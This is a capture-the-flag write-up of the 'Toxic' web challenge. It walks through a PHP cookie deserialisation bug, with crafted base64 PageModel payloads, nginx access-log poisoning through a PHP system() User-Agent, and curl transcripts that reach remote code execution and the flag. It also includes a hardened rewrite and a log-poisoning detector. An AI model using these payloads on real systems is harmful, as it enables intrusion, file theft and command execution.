Toxic

Check the code first.
index.php
<?php
spl_autoload_register(function ($name){
    if (preg_match('/Model$/', $name))
    {
        $name = "models/${name}";
    }
    include_once "${name}.php";
});

if (empty($_COOKIE['PHPSESSID']))
{
    $page = new PageModel;
    $page->file = '/www/index.html';

    setcookie(
        'PHPSESSID', //name
        base64_encode(serialize($page)), //value
        time()+60*60*24, //expire day
        '/' //"/" means that the cookie is available in entire website 
    );
} 

$cookie = base64_decode($_COOKIE['PHPSESSID']);
unserialize($cookie); 

models/PageModel.php 
<?php
class PageModel
{
    public $file;

    public function __destruct() 
    {
        include($this->file);
    }
}

We can see that the PHPSESSID cookie is base64-decoded and passed straight to unserialize(), and the file shown on the page is taken from the deserialised object: PageModel's __destruct() runs include($this->file), so whoever controls the cookie controls which file gets included.
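As an added example (not the challenge's code; it assumes a /www page root and an allowlist of two page names), this is how index.php looks once the client is no longer handed a serialised object to tamper with:

```php
<?php
// Added example, not the challenge's code: a hardened replacement for index.php.
// The original stores a serialize()d PageModel in PHPSESSID and unserialize()s
// whatever the client sends back, so the client controls $file and the
// __destruct() include(). Here the cookie carries only a page name, the name is
// checked against an allowlist, and the path is built server-side.
declare(strict_types=1);

const PAGE_DIR      = '/www';             // assumption: same web root as the original
const ALLOWED_PAGES = ['index', 'about']; // assumption: pages the site actually serves

final class PageModel
{
    private string $file;

    public function __construct(string $page)
    {
        // Strict allowlist check before anything touches the filesystem;
        // no "../", no absolute paths and no log files can get through.
        if (!in_array($page, ALLOWED_PAGES, true)) {
            throw new InvalidArgumentException('unknown page');
        }
        $this->file = PAGE_DIR . '/' . $page . '.html';
    }

    public function render(): void
    {
        // readfile() emits the file as data. include() would execute any PHP
        // inside it, which is what made the poisoned access log exploitable.
        readfile($this->file);
    }
}

// The cookie is an opaque page name, never an object graph.
$page = $_COOKIE['page'] ?? 'index';
if (!in_array($page, ALLOWED_PAGES, true)) {
    $page = 'index';
}
setcookie('page', $page, [
    'expires'  => time() + 60 * 60 * 24,
    'path'     => '/',
    'httponly' => true,
    'samesite' => 'Lax',
]);
// If legacy data must still be unserialize()d, at least forbid object
// instantiation so no __destruct()/__wakeup() gadget can fire:
//   $data = unserialize($cookie, ['allowed_classes' => false]);
(new PageModel($page))->render();
```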

PHPSESSID:"Tzo5OiJQYWdlTW9kZWwiOjE6e3M6NDoiZmlsZSI7czoxNToiL3d3dy9pbmRleC5odG1sIjt9"

kali@kali:~/0.htb/challenges/Web/Toxic$ echo Tzo5OiJQYWdlTW9kZWwiOjE6e3M6NDoiZmlsZSI7czoxNToiL3d3dy9pbmRleC5odG1sIjt9| base64 -d
O:9:"PageModel":1:{s:4:"file";s:15:"/www/index.html";}

By modifying the serialised object we can read arbitrary files from the server, but we can't read the flag directly because we don't know its filename. So we try to poison the server logs instead.

kali@kali:~/0.htb/challenges/Web/Toxic$ echo 'O:9:"PageModel":1:{s:4:"file";s:25:"/var/log/nginx/access.log";}' | base64
Tzo5OiJQYWdlTW9kZWwiOjE6e3M6NDoiZmlsZSI7czoyNToiL3Zhci9sb2cvbmdpbngvYWNjZXNzLmxvZyI7fQo=
kali@kali:~/0.htb/challenges/Web/Toxic$ 

We send this new cookie to the server and the nginx access log is included into the page. Since nginx writes the User-Agent header into that log, a PHP tag sent in User-Agent gets executed the next time the log is included.

GET / HTTP/1.1
Host: 127.0.0.1:1337
User-Agent: <?php system('ls /');?>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=Tzo5OiJQYWdlTW9kZWwiOjE6e3M6NDoiZmlsZSI7czoyNToiL3Zhci9sb2cvbmdpbngvYWNjZXNzLmxvZyI7fQo=
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

curl -H "Host: example.com" http://localhost/
curl -A "user-agent-name-here" [URL]
curl --user-agent 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0' example.com
curl -v --cookie "USER_TOKEN=Yes" http://127.0.0.1:5000/

kali@kali:~/0.htb/challenges/Web/Toxic$ curl -H "127.0.0.1:1337" --user-agent "<?php system('ls /');?>" --cookie "PHPSESSID=Tzo5OiJQYWdlTW9kZWwiOjE6e3M6NDoiZmlsZSI7czoyNToiL3Zhci9sb2cvbmdpbngvYWNjZXNzLmxvZyI7fQo=" http://159.65.25.26:30559 -v
*   Trying 159.65.25.26:30559...
* Connected to 159.65.25.26 (159.65.25.26) port 30559 (#0)
> GET / HTTP/1.1
> Host: 159.65.25.26:30559
> User-Agent: <?php system('ls /');?>
> Accept: */*
> Cookie: PHPSESSID=Tzo5OiJQYWdlTW9kZWwiOjE6e3M6NDoiZmlsZSI7czoyNToiL3Zhci9sb2cvbmdpbngvYWNjZXNzLmxvZyI7fQo=
> 127.0.0.1:1337
> 
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Server: nginx
< Date: Wed, 05 May 2021 18:06:53 GMT
< Content-Type: text/html; charset=UTF-8
< Transfer-Encoding: chunked
< Connection: keep-alive
< X-Powered-By: PHP/7.4.15
< 
159.65.25.26 - 200 "GET / HTTP/1.1" "-" "curl/7.74.0" 
159.65.25.26 - 200 "GET / HTTP/1.1" "-" "curl/7.74.0" 
159.65.25.26 - 200 "GET / HTTP/1.1" "-" "bin
dev
entrypoint.sh
etc
flag_cDLYe
home
lib
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var
www
" 
* Connection #0 to host 159.65.25.26 left intact
kali@kali:~/0.htb/challenges/Web/Toxic$ 
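From the defender's side, the poisoned request leaves a PHP open tag sitting in the access log. This added example (not from the writeup) parses the log format the server echoed back above and flags such lines; the sample lines are constructed from the transcript:

```php
<?php
// Added example, not part of the writeup: flag access-log lines whose quoted
// fields carry a PHP open tag, the artefact the log-poisoning step leaves behind.
// Log format assumed from the lines the server echoed back:
//   <ip> - <status> "<request>" "<referer>" "<user-agent>"
declare(strict_types=1);

/**
 * Return one entry per suspicious line, naming the field that matched.
 * @param string[] $lines
 * @return array<int, array{field: string, line: string}>
 */
function findPoisonedLines(array $lines): array
{
    // <?php and <?= are enough for this format; a bare "<?" would also flag
    // harmless strings such as "<?xml".
    $openTag = '/<\?(php\b|=)/i';
    $format  = '/^(\S+) - (\d{3}) "(.*)" "(.*)" "(.*)"$/';
    $hits    = [];

    foreach ($lines as $line) {
        if (!preg_match($format, $line, $m)) {
            // A line that does not fit the format is itself worth a look.
            $hits[] = ['field' => 'unparseable', 'line' => $line];
            continue;
        }
        $fields = ['request' => $m[3], 'referer' => $m[4], 'user_agent' => $m[5]];
        foreach ($fields as $name => $value) {
            if (preg_match($openTag, $value)) {
                $hits[] = ['field' => $name, 'line' => $line];
                break; // one report per line is enough
            }
        }
    }
    return $hits;
}

// Constructed sample: a benign request and the poisoned User-Agent from the
// transcript above, plus a tag planted in the Referer field.
$sample = [
    '159.65.25.26 - 200 "GET / HTTP/1.1" "-" "curl/7.74.0"',
    '159.65.25.26 - 200 "GET / HTTP/1.1" "-" "<?php system(\'ls /\');?>"',
    '10.0.0.5 - 200 "GET / HTTP/1.1" "<?php echo 1; ?>" "Mozilla/5.0"',
];

foreach (findPoisonedLines($sample) as $hit) {
    printf("[%s] %s\n", $hit['field'], $hit['line']);
}
```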

kali@kali:~/0.htb/challenges/Web/Toxic$ echo 'O:9:"PageModel":1:{s:4:"file";s:11:"/flag_cDLYe";}' | base64
Tzo5OiJQYWdlTW9kZWwiOjE6e3M6NDoiZmlsZSI7czoxMToiL2ZsYWdfY0RMWWUiO30K

curl --cookie "PHPSESSID=Tzo5OiJQYWdlTW9kZWwiOjE6e3M6NDoiZmlsZSI7czoxMToiL2ZsYWdfY0RMWWUiO30K" http://159.65.25.26:30559 -v

kali@kali:~/0.htb/challenges/Web/Toxic$ curl --cookie "PHPSESSID=Tzo5OiJQYWdlTW9kZWwiOjE6e3M6NDoiZmlsZSI7czoxMToiL2ZsYWdfY0RMWWUiO30K" http://159.65.25.26:30559 -v
*   Trying 159.65.25.26:30559...
* Connected to 159.65.25.26 (159.65.25.26) port 30559 (#0)
> GET / HTTP/1.1
> Host: 159.65.25.26:30559
> User-Agent: curl/7.74.0
> Accept: */*
> Cookie: PHPSESSID=Tzo5OiJQYWdlTW9kZWwiOjE6e3M6NDoiZmlsZSI7czoxMToiL2ZsYWdfY0RMWWUiO30K
> 
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Server: nginx
< Date: Wed, 05 May 2021 18:23:44 GMT
< Content-Type: text/html; charset=UTF-8
< Transfer-Encoding: chunked
< Connection: keep-alive
< X-Powered-By: PHP/7.4.15
< 
HTB{P0i5on_1n_Cyb3r_W4rF4R3?!}
* Connection #0 to host 159.65.25.26 left intact
kali@kali:~/0.htb/challenges/Web/Toxic$ 
kali@kali:~/0.htb/challenges/Web/Toxic$ nikto -h http://138.68.182.108:30734
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          138.68.182.108
+ Target Hostname:    138.68.182.108
+ Target Port:        30734
+ Start Time:         2021-05-05 08:19:10 (GMT-4)
---------------------------------------------------------------------------
+ Server: nginx
+ Cookie PHPSESSID created without the httponly flag
+ Retrieved x-powered-by header: PHP/7.4.15
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OSVDB-3092: /css/: This might be interesting...
+ OSVDB-3092: /js: This might be interesting...
+ 7923 requests: 0 error(s) and 7 item(s) reported on remote host
+ End Time:           2021-05-05 08:32:42 (GMT-4) (812 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
kali@kali:~/0.htb/challenges/Web/Toxic$ 